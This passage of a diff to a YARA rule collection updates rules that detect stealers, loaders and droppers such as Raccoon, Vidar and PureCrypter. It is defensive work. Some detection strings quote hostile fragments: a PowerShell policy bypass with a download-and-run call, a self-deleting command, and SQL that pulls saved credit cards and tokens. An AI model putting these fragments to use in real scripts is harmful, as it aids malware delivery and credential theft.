6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29} + $s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B} + $s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" condition: - uint16(0)==0x5A4D and 5 of them + all of ($s*) and uint16(0)==0x5A4D } -import "pe" - -rule RUSSIANPANDA_Nitrogen_Python311_Rule : FILE +rule RUSSIANPANDA_Win_Sus_Internetshortcutfile { meta: - description = "Detects side-loaded Python311 DLL for the new Nitrogen campaign 10-23-2023" + description = "Detects suspicious Internet Shortcut Files that are often used to retrieve malware" author = "RussianPanda" - id = "608d20b2-24f8-5c95-bab5-83748a7bf3b1" - date = "2023-10-24" - modified = "2023-12-11" - reference = "https://www.esentire.com/blog/persistent-connection-established-nitrogen-campaign-leverages-dll-side-loading-technique-for-c2-communication" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Nitrogen/nitrogen_python311.yar#L3-L21" + id = "88d5d33f-0342-5575-b5e4-31ac5695abf2" + date = "2024-02-17" + modified = "2024-02-17" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Techniques/win_sus_InternetShortcutFile.yar#L1-L19" license_url = "N/A" - logic_hash = "04db05b3b130c9de3ff02a6a16775be9d3a50d3025bcf1e075ae56c751304154" - score = 75 - quality = 83 - tags = "FILE" + logic_hash = "9ec321ba521949fcc1db09b843913424182bfbb14eac61e92b7132d88b275ceb" + score = 65 + quality = 58 + tags = "" strings: - $s1 = { 68 62 6F 6B 62 69 30 2F } - $s2 = { 48 B8 ?? ?? ?? ?? ?? ?? ?? 00 48 89 44 24 5C } - $s3 = { 48 8B 05 ?? ?? 09 00} + $s1 = "[InternetShortcut]" + $s2 = {55 52 4C 3D 66 69 6C 65 3A 2F 2F} + $a1 = ".exe" + $a2 = ".dll" + $a3 = ".js" + $a4 = ".msi" + $a5 = ".msix" + $a6 = ".bat" + $a7 = ".cmd" condition: - all of ($s*) and uint16(0)==0x5A4D and pe.exports("nop") + all of ($s*) and any of ($a*) } rule RUSSIANPANDA_Susp_Obf_Py_Marshal_Module : FILE { @@ -206941,7 +208879,7 @@ rule RUSSIANPANDA_Susp_Obf_Py_Marshal_Module : FILE date = "2024-01-16" modified = "2024-01-16" reference = "https://www.trendmicro.com/fr_fr/research/23/j/infection-techniques-across-supply-chains-and-codebases.html" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Techniques/susp_obf_py_marshal_module.yar#L1-L18" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Techniques/susp_obf_py_marshal_module.yar#L1-L18" license_url = "N/A" hash = "d740129ff6bdb65a324eadf4ac8de3893a54306cf2a11712a305ef6247204092" logic_hash = "f150fae6d7a4642f714f4620dab65f452e5eb9cb57e9cbea46010aac3ecbb3cb" @@ -206959,577 +208897,597 @@ rule RUSSIANPANDA_Susp_Obf_Py_Marshal_Module : FILE condition: $s1 and any of ($t*) and filesize <2MB } -rule RUSSIANPANDA_Win_Sus_Internetshortcutfile +rule RUSSIANPANDA_Legionloader_Dropper : FILE { meta: - description = "Detects suspicious Internet Shortcut Files that are often used to retrieve malware" + description = "Detects malicious LegionLoader DLL dropper" author = "RussianPanda" - id = "88d5d33f-0342-5575-b5e4-31ac5695abf2" - date = "2024-02-17" - modified = "2024-02-17" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Techniques/win_sus_InternetShortcutFile.yar#L1-L19" + id = "a1b04033-cfe0-5088-bfee-d08752e8840b" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/LegionLoader/LegionLoader_dropper.yar#L1-L17" license_url = "N/A" - logic_hash = "9ec321ba521949fcc1db09b843913424182bfbb14eac61e92b7132d88b275ceb" - score = 65 - quality = 58 - tags = "" + hash = "ef5b961ebc6167e728f9bf40e726ac71" + logic_hash = "0871a6a0ab2c405793e8a49e662ba41acdcc6c8afac315f290de2cc05abd39fa" + score = 75 + quality = 85 + tags = "FILE" strings: - $s1 = "[InternetShortcut]" - $s2 = {55 52 4C 3D 66 69 6C 65 3A 2F 2F} - $a1 = ".exe" - $a2 = ".dll" - $a3 = ".js" - $a4 = ".msi" - $a5 = ".msix" - $a6 = ".bat" - $a7 = ".cmd" + $s1 = {48 03 CA [0-50] 33 D2 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9 FF 15} + $s2 = {44 30 3B 48 FF C3} + $s3 = {8B ?? 8B ?? 83 ?? 01 D1 ?? F7 ?? 81 ?? 20 83 B8 ED 8B} condition: - all of ($s*) and any of ($a*) + uint16(0)==0x5A4D and all of them and filesize <1MB } -rule RUSSIANPANDA_Check_Installed_Software : FILE +rule RUSSIANPANDA_Prysmax_Stealer : FILE { meta: - description = "No description has been set in the source file - RussianPanda" + description = "Detects Prysmax Stealer" author = "RussianPanda" - id = "a45c7012-dc83-59da-a691-251f0a06be12" - date = "2024-01-14" - modified = "2024-01-15" - reference = "https://unprotect.it/technique/checking-installed-software/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Techniques/check_installed_software.yar#L1-L19" + id = "97ab92b8-1771-5881-9cd1-d8ff76b8f380" + date = "2024-01-09" + modified = "2024-01-10" + reference = "https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Prysmax Stealer/prysmax_stealer.yar#L1-L21" license_url = "N/A" - hash = "db44d4cd1ea8142790a6b26880b41ee23de5db5c2a63afb9ee54585882f1aa07" - logic_hash = "ab079f1edaffca5bce1e872d6e4fc44f7c22b9260feaed7cd38e578646d420ef" - score = 50 - quality = 35 + logic_hash = "869eee7dd5209bdea98c248791b9ac911e3daabe6d440aa62aecefa43539a41c" + score = 75 + quality = 73 tags = "FILE" strings: - $d1 = "DisplayVersion" - $u1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" - $reg = "RegOpenKeyExA" - $h = {68 (01|02) 00 00 80} + $a1 = {23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23} + $s2 = {73 70 72 79 73 6D 61 78} + $s3 = {56 43 52 55 4E 54 49 4D 45 31 34 30 2E 64 6C 6C} + $s4 = {56 43 52 55 4E 54 49 4D 45 31 34 30 5F 31 2E 64 6C 6C} + $s5 = {4D 53 56 43 50 31 34 30 2E 64 6C 6C} + $s6 = {50 79 49 6E 73 74 61 6C 6C 65 72} condition: - uint16(0)==0x5A4D and $reg and $h and for any i in (1..#u1) : ($d1 in (@u1[i]-200..@u1[i]+200)) + all of ($s*) and uint16(0)==0x5A4D and $a1 in (9600000.. filesize ) and #a1>600 and filesize >60MB and filesize <200MB } -rule RUSSIANPANDA_Golang_Base64_Enc : FILE +import "dotnet" + +rule RUSSIANPANDA_Purecrypter_Core : FILE { meta: - description = "Detects Base64 Encoding and Decoding patterns in Golang binaries" + description = "Detects PureCrypter Core payload" author = "RussianPanda" - id = "6330e005-9c67-5acd-9063-aa7e30e92f5f" - date = "2024-01-10" - modified = "2024-01-14" - reference = "https://unprotect.it/technique/base64/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Techniques/golang_base64_enc.yar#L1-L18" + id = "41aaa187-0fb5-53fe-a162-8d1a4974ccc1" + date = "2024-01-09" + modified = "2024-01-09" + reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/PureCrypter/purecrypter_core.yar#L3-L28" license_url = "N/A" - hash = "509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c" - logic_hash = "72cf3ee948df9c4ce593f16a49397e79fdc5ecc3264b3685bbc54f60ed1278bd" + hash = "e4faa7d7a098414449abffb210fd874798207ee9d27643c8088676ff429b56b7" + logic_hash = "8c761a98369436ffbe1379152461753778985a42ae656567018b47c71af7d866" score = 75 - quality = 83 + quality = 81 tags = "FILE" strings: - $s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29} - $s2 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29} - $s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B} - $s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" + $s1 = {47 5A 69 70 53 74 72 65 61 6D} + $s2 = {41 73 73 65 6D 62 6C 79 4C 6F 61 64 65 72 00 43 6F 73 74 75 72 61} + $s3 = {44 65 66 6C 61 74 65 53 74 72 65 61 6D} + $cnct = {72 ?? ?? 00 70 28 FB 00 00 0A 72 ?? ?? 00 70 28 ?? 00 00 0A} + $nr1 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D} + $nr2 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D} + $nr3 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D} + $nr4 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D} condition: - all of ($s*) and uint16(0)==0x5A4D + filesize <5MB and all of ($s*) and dotnet.number_of_resources>4 and dotnet.number_of_resources<6 and 2 of ($nr*) and dotnet.assembly_refs[1].name contains "protobuf-net" and #cnct>5 } -rule RUSSIANPANDA_Win_Mal_Gobitloader : FILE +import "dotnet" + +rule RUSSIANPANDA_Purecrypter : FILE { meta: - description = "Detects GoBitLoader" + description = "Detects PureCrypter" author = "RussianPanda" - id = "4ebc7987-c1b2-5682-943f-7c19a9cb6b36" - date = "2024-03-24" - modified = "2024-03-24" - reference = "https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/GoBitLoader/win_mal_GoBitLoader.yar#L1-L13" + id = "5670772c-ada1-55fa-b7fd-9dadd1756259" + date = "2024-01-09" + modified = "2024-01-09" + reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/PureCrypter/purecrypter.yar#L3-L22" license_url = "N/A" - logic_hash = "66951b290bef6a6c9eef4ea674472465dfe0ec5072dce21f48b58191f7ce90e3" + hash = "566d8749e166436792dfcbb5e5514f18c9afc0e1314833ac2e3d86f37ff2030f" + logic_hash = "dd8592fa0b7d240d23235008601500a20e068032f6dcd6e90a38b06ac747b8af" score = 75 - quality = 79 + quality = 83 tags = "FILE" strings: - $s1 = {6D 61 69 6E 2E 52 65 64 69 72 65 63 74 54 6F 50 61 79 6C 6F 61 64} - $s2 = {6D 61 69 6E 2E 48 6F 6C 6C 6F 77 50 72 6F 63 65 73 73} - $s3 = {6D 61 69 6E 2E 41 65 73 44 65 63 6F 64 65 2E 66 75 6E 63 31} + $s1 = {28 ?? 00 00 ?? 28 02 00 00 2B 28 ?? 00 00 (0A|06)} + $s2 = {73 ?? 00 00 0A} + $s3 = {73 ?? 00 00 06 6F ?? 00 00 06} + $s4 = {52 65 73 6F 75 72 63 65 4D 61 6E 61 67 65 72} + $s5 = {28 ?? 00 00 ?? 6F ?? 00 00 0A 28 03 00 00 2B ?? 6F ?? 00 00 0A 28 ?? 00 00 2B} condition: - uint16(0)==0x5A4D and all of them + filesize <6MB and 4 of ($s*) and dotnet.number_of_resources>0 and dotnet.number_of_resources<2 and dotnet.resources[0].length>300KB } -rule RUSSIANPANDA_Whitesnakestealer : FILE +rule RUSSIANPANDA_Raccoonstealerv2 : FILE { meta: - description = "WhiteSnake Stealer" + description = "Detects the latest unpacked/unobfuscated build 2.1.0-4" author = "RussianPanda" - id = "70b69aba-5096-59a6-bb0b-44d248aecc26" - date = "2023-07-04" - modified = "2023-12-11" - reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/WhiteSnake-Stealer/WhiteSnake_rc4.yar#L1-L17" + id = "eda6216a-219b-5f60-8084-4c0c240a4cb4" + date = "2023-04-17" + modified = "2023-05-05" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/RaccoonStealer_v2/raccoonstealerv2_2.1.0-4_build.yar#L1-L14" license_url = "N/A" - logic_hash = "24985a2c3b0d72858decd17cb2b8e485caa94c01ad72a014edc68ed4facfd71e" - score = 75 - quality = 83 + logic_hash = "e2226f08753a3571045953363c04ec52de3c79cd0cd29e7ecb6afaf2ad573e4e" + score = 50 + quality = 85 tags = "FILE" strings: - $s1 = {73 68 69 74 2e 6a 70 67} - $s2 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C} - $s3 = "qemu" wide - $s4 = "vbox" wide + $pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8} + $pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00} + $pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00} + $m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00} + $m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00} condition: - all of ($s*) and filesize <300KB + 2 of ($pattern*) and uint16(0)==0x5A4D and 1 of ($m*) and uint32( uint32(0x3C))==0x00004550 and filesize <200KB } -rule RUSSIANPANDA_Whitesnakestealer_1 : FILE +rule RUSSIANPANDA_Raccoonstealer : FILE { meta: - description = "Detects WhiteSnake Stealer XOR samples " + description = "Detects Raccoon Stealer v2.3.1.1" author = "RussianPanda" - id = "cfe168a6-cc2f-5cfe-985c-78b232dc2651" - date = "2023-07-04" - modified = "2023-12-11" - reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/WhiteSnake-Stealer/WhiteSnake_xor.yar#L1-L15" + id = "29f28cd5-370b-5831-8b71-a253f468f7e4" + date = "2024-01-08" + modified = "2024-01-08" + reference = "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raccoon-stealer-v2-0" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/RaccoonStealer_v2/raccoonstealer_v2.3.1.1.yar#L1-L20" license_url = "N/A" - logic_hash = "0bd0e250b8598be297296ecf6644d3bf649e3dc4598438325a0913afed04c819" + hash = "c6d0d98dd43822fe12a1d785df4e391db3c92846b0473b54762fbb929de6f5cb" + logic_hash = "ee2b39c1c2068b97e63a03330a2f9e2f12e53aaf9cfffb274acde2372a11fe45" score = 75 - quality = 83 + quality = 85 tags = "FILE" strings: - $s1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE} - $s2 = {61 6e 61 6c 2e 6a 70 67} + $s1 = {8B 0D [2] 41 00 A3 [3] 00} + $s2 = "MachineGuid" + $s3 = "SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards" + $s4 = "SELECT service, encrypted_token FROM token_service" + $s5 = "&configId=" + $s6 = "machineId=" condition: - all of ($s*) and filesize <600KB + all of ($s*) and #s1>10 and uint16(0)==0x5A4D and filesize <5MB } -rule RUSSIANPANDA_Atomic_Stealer : FILE +rule RUSSIANPANDA_Vidar_DLL_Embedded { meta: - description = "Detects Atomic Stealer targering MacOS" + description = "Vidar Stealer with embedded DLL dependencies" author = "RussianPanda" - id = "259c5c33-0164-568f-aec4-4fe0a2c6d015" - date = "2024-01-13" - modified = "2024-01-17" - reference = "https://www.bleepingcomputer.com/news/security/macos-info-stealers-quickly-evolve-to-evade-xprotect-detection/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/AtomicStealer/Atomic_Stealer.yar#L1-L27" + id = "462fe42a-2504-5e7e-ad90-2c7e54478204" + date = "2023-05-02" + modified = "2023-05-05" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/VidarStealer/vidar_ver3.6_3.7_dll_embedded.yar#L1-L21" license_url = "N/A" - hash = "dd8aa38c7f06cb1c12a4d2c0927b6107" - logic_hash = "7601e508aeccba943b54e675212993920c984271f655e68c19efaf6d12cfebd5" + logic_hash = "98d23523c2ab196f670dc33164954fc69a1c1692fa870a476e25d7dd3cebace2" score = 75 - quality = 58 - tags = "FILE" + quality = 85 + tags = "" strings: - $s1 = {8B 09 83 C1 (01|02|04|05|03) 39 C8 0F 85 38 00 00 00 48 8B 85} - $s2 = {C7 40 04 00 00 00 00 C6 40 08 00 C6 40 09 00} - $t1 = {80 75 D?} - $t2 = {0F 57 05 ?? 1B 01 00} - $t3 = {8A 06 34 DE 88 07 8A 46 01 34 DF 88 47 01} - $c1 = {28 ?? 40 39} - $c2 = {64 65 73 6B 77 61 6C 6C 65 74 73} + $s = {50 4B 03 04 14 00 00 00 08 00 24 56 25 55 2B 6D 5C 08 39 7C 05} + $a1 = "https://t.me/mastersbots" + $a2 = "https://steamcommunity.com/profiles/76561199501059503" + $a3 = "%s\\%s\\Local Storage\\leveldb" + $a4 = "\\Autofill\\%s_%s.txt" + $a5 = "\\Downloads\\%s_%s.txt" + $a6 = "\\CC\\%s_%s.txt" + $a7 = "Exodus\\exodus.wallet" condition: - ( uint32(0)==0xfeedface or uint32(0)==0xcefaedfe or uint32(0)==0xfeedfacf or uint32(0)==0xcffaedfe or uint32(0)==0xcafebabe or uint32(0)==0xbebafeca) and all of ($s*) and #s1>60 and #s2>100 or ( all of ($t*) and #t1>10 and #t2>5) or (#c1>200 and $c2) + $s and 5 of ($a*) } -rule RUSSIANPANDA_Win_Mal_Zloader : FILE +rule RUSSIANPANDA_Ghostgambit : FILE { meta: - description = "Detects Zloader and other Zloader modules that employ the same encryption" + description = "Detects GhostGambit dropper" author = "RussianPanda" - id = "3f72e067-c82b-5c65-92c8-010955971d87" - date = "2024-03-10" - modified = "2024-03-10" + id = "0348b9fa-59be-5f30-8ebc-f1e87cf98b07" + date = "2024-07-09" + modified = "2024-07-09" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Zloader/win_mal_Zloader.yar#L1-L13" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/GhostGambit/GhostGambit.yar#L1-L14" license_url = "N/A" - logic_hash = "9ac9e8ca4a6f84e1bccac2292705ee6ebbc1595eb3f40ed777f7973e9bda7fc1" + hash = "2b16c68d9bafbd2ecf3634d991d7c794" + logic_hash = "419efbea3c347d0ec9365c0c21cccb6f229f8c42d22a2bcfdf14854e7f83aea1" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {8B 45 ?? 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 8B 45 ?? 99 F7 F9 8B 45 ?? 48 63 D2 48 8D 0D ?? ?? ?? 00 0F BE 0C 11 31 C8 88 C2 48 8B 45 F0 48 63 4D} - $s2 = {48 63 C9 44 0F B6 04 08 48 8B 45 E8 8B 4D D4 0F B6 14 08 44 31 C2 88 14 08 8B 45 D4} - $s3 = {B9 11 00 00 00 99 F7 F9 8B [0-20] 31 C8 88 C2} - $s4 = {8B 45 ?? BE 11 00 00 00 99 F7 [0-20] 83 F6 FF} + $s1 = "/code32" ascii wide + $s2 = "/reg32" ascii wide + $s3 = "ZhuDongFangYu.exe" ascii wide + $s4 = "/c ping -n 4 127.0.0.1 > nul && del" ascii wide condition: - uint16(0)==0x5A4D and any of them + uint16(0)==0x5A4D and all of them } -import "pe" - -rule RUSSIANPANDA_Andeloader +rule RUSSIANPANDA_Win_Mal_Rustydropper : FILE { meta: - description = "Detects Ande Loader" + description = "Detects RustyDropper" author = "RussianPanda" - id = "c08d63b6-9fef-505d-9611-9dd0403c7c7c" - date = "2023-12-11" - modified = "2023-12-11" + id = "9f217080-81e0-547a-9336-cf8ac2fadf36" + date = "2024-03-01" + modified = "2024-03-01" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/AndeLoader/ande_loader.yar#L3-L18" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/RustyDropper/win_mal_RustyDropper.yar#L1-L12" license_url = "N/A" - logic_hash = "cd55153077e5cfbd84cbe5b062dbd842def245417acfea4ed6c2b1db702dcc81" + hash = "a3a5e7011335a2284e2d4f73fd464ff129f0c9276878a054c1932bc50608584b" + logic_hash = "d0c76bcd1af63cc1b1fbabc3fa33e6caafd7d9c7c3780a94a1ed37eadef655d7" score = 75 - quality = 83 - tags = "" + quality = 81 + tags = "FILE" strings: - $s1 = {59 61 6E 6F 41 74 74 72 69 62 75 74 65} - $s2 = "CreateShortcut" wide - $s3 = ".vbs" wide + $s1 = {47 3a 5c 52 55 53 54 5f 44 52 4f 50 50 45 52 5f 45 58 45 5f 50 41 59 4c 4f 41 44 5c 44 52 4f 50 50 45 52 5f 4d 41 49 4e 5c} + $s2 = {46 45 41 54 55 52 45 5f 42 52 4f 57 53 45 52 5f 45 4d 55 4c 41 54 49 4f 4e} condition: - 3 of ($s*) and pe.imports("mscoree.dll") + uint16(0)==0x5A4D and all of them } -rule RUSSIANPANDA_Mal_Botnetfenix_Payload : FILE +rule RUSSIANPANDA_Fakebat_Powershell { meta: - description = "Detects BotnetFenix payload" + description = "Detects FakeBat PowerShell scripts" author = "RussianPanda" - id = "566bfae1-c43d-5bd6-adcf-faff32d8c325" - date = "2024-02-02" - modified = "2024-02-04" + id = "76149a6f-c370-5e48-82cc-c89b545c0aa8" + date = "2023-12-01" + modified = "2023-12-01" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/FenixBotnet/mal_BotnetFenix_Payload.yar#L1-L16" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/FakeBat/fakebat_powershell.yar#L1-L13" license_url = "N/A" - hash = "65a9575c50a96d04a3f649fe0f6b8ccd" - logic_hash = "27f423b509ad8de0f8389c7b3e3bfec2eeb10c964aa8c70bad47cc4334df1a5e" + logic_hash = "df6b30d97ac6c9b248fed0d901e8a0a6ad1d855483a5006b008b839d9961092a" score = 75 quality = 85 - tags = "FILE" + tags = "" strings: - $s1 = "tasks_register" - $s2 = "actionget_action" - $s3 = "Post Success" - $s4 = "Success Stealer" - $s5 = "Download and Execute task id" - $a = "_CorExeMain" + $s1 = "$LoadDomen/?status=start&av=" nocase + $s2 = "$xxx.gpg" nocase condition: - uint16(0)==0x5A4D and 4 of ($s*) and $a + all of ($s*) } -rule RUSSIANPANDA_Mal_Fenixbotnet_Jse +rule RUSSIANPANDA_Smartapesg_JS_Netsupportrat_Stage2 : FILE { meta: - description = "Detects Fenix Botnet JSE downloader" + description = "Detects SmartApeSG JavaScript Stage 2 retrieving NetSupportRAT" author = "RussianPanda" - id = "00c6f8a6-c2e2-5b08-b332-b91371060bbe" - date = "2024-01-18" - modified = "2024-02-02" + id = "2a614e11-be32-5bf1-9fd1-da224f0a644e" + date = "2024-01-11" + modified = "2024-01-12" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/FenixBotnet/mal_FenixBotnet_jse.yar#L1-L14" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SmartApeSG/SmartApeSG_JS_NetSupportRAT_stage2.yar#L1-L23" license_url = "N/A" - hash = "a7fadf0050d4d0b2cefd808e16dfde69" - logic_hash = "848c00361fba60e63e8ec4098404e87d4ba2b11d8489ad16d49c20fc653a5e45" + hash = "67d8f84b37732cf85e05b327ad6b6a9f" + logic_hash = "5a2afaa14d513e0a3c4e52acfb433e53a4541983a05d15318a217c14dc06453c" score = 75 quality = 85 - tags = "" + tags = "FILE" strings: - $s1 = {76 61 72 20 [0-30] 3D 20 22 66 22} - $s2 = {76 61 72 20 [0-30] 3D 20 22 75 22} - $s3 = {76 61 72 20 [0-30] 3D 20 22 6E 22} - $s4 = {6E 65 77 20 46 75 6E 63 74 69 6F 6E 28 64 65 63 6F 64 65 55 52 49 43 6F 6D 70 6F 6E 65 6E 74 28 [0-30] 29 29 2E 63 61 6C 6C 28 29} + $x1 = "powershell.exe -Ex Bypass -NoP -C $" + $x2 = "Get-Random -Minimum -1000 -Maximum 1000" + $s1 = "HKCU:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" + $s2 = "=new ActiveXObject('W" + $s3 = "System.Net.WebClient).DownloadString($" + $s4 = "FromBase64String" + $s5 = "Start-Process -FilePath $" condition: - all of ($s*) + filesize <1MB and ((1 of ($x*) and 3 of them ) or 5 of them ) } -rule RUSSIANPANDA_Mal_Asuka_Stealer : FILE +rule RUSSIANPANDA_Smartapesg_JS_Dropper_Stage1 : FILE { meta: - description = "Detects AsukaStealer" + description = "Detects SmartApeSG initial JavaScript file" author = "RussianPanda" - id = "a718be5f-dc76-5610-9237-038a9719d7e5" - date = "2024-02-02" - modified = "2024-03-18" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/AsukaStealer/mal_asuka_stealer.yar#L1-L12" + id = "9513f323-c315-5ae2-92a5-c831d0a7ce2a" + date = "2024-01-11" + modified = "2024-01-11" + reference = "https://medium.com/walmartglobaltech/smartapesg-4605157a5b80" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SmartApeSG/SmartApeSG_JS_dropper_stage1.yar#L1-L18" license_url = "N/A" - logic_hash = "7974e0de821ddcafd4f00b27d587108f0d80f8a231dd0db4d2be4fa6ab44fef4" + hash = "8769d9ebcf14b24a657532cd96f9520f54aa0e799399d840285311dfebe3fb15" + logic_hash = "de7e4ec30c780699b46de7baf2a916fdb7331da2ee7c2d637422ea664cd03b82" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {32 14 3E E8 F6 81 00 00} - $s2 = {00 58 00 2D 00 43 00 6F 00 6E 00 66 00 69 00 67} - $s3 = {58 00 2D 00 49 00 6E 00 66 00 6F} + $a1 = "'GE'+'T'" + $a2 = "'GE','T'" + $s1 = "pt.Creat" + $s2 = "L2.ServerX" + $s3 = "ponseText" + $s4 = "MLHTTP.6.0" + $s5 = /\/news\.php\?([0-9]|[1-9][0-9]|100)/ condition: - uint16(0)==0x5A4D and all of them + all of ($s*) and filesize <1MB and any of ($a*) } -rule RUSSIANPANDA_Win_Mal_Rustydropper : FILE +import "pe" + +rule RUSSIANPANDA_Purelogs_Stealer_Core : FILE { meta: - description = "Detects RustyDropper" + description = "Detects Pure Logs Stealer Core Payload" author = "RussianPanda" - id = "9f217080-81e0-547a-9336-cf8ac2fadf36" - date = "2024-03-01" - modified = "2024-03-01" + id = "bda876c3-76ce-5e1e-8dd4-f06e8240fc11" + date = "2023-12-26" + modified = "2024-01-10" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = 